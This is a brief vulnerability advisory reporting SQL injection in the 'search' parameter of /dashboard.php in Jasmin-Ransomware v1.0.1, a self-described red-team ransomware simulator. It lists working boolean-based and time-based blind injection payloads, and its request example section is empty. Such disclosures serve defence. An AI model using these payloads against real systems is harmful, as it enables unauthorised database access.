Key Information Vulnerability Description Vulnerability Type: SQL Injection (SQLi) Affected Software: Jasmin-Ransomware v1.0.1 Vulnerable File: /dashboard.php Parameter: search Detailed Information Vendor: Jasmin-Ransomware Software Link: codesiddhant/jasmin-Ransomware - Jasmin Ransomware is an advanced red team tool (WannaCry clone) designed to simulate real ransomware attacks, helping security researchers mitigate external attack risks. Version Version: V1.0.1 POC (Proof of Concept) HTTP Request Example Parameter Analysis Parameter: search (GET) Type: Boolean-based blind and Time-based blind Boolean-based Blind: - Title: AND boolean-based blind - WHERE or HAVING clause - Payload: search='1' AND 3781=3781 AND ('Gxmz' LIKE 'Gxmz&pageno=1 Time-based Blind: - Title: MySQL >= 5.0.12 AND time-based blind (SLEEP) - Payload: search='1' AND SLEEP(5) AND ('oNUy' LIKE 'oNUy&pageno=1 `` /dashboard.php search` parameter.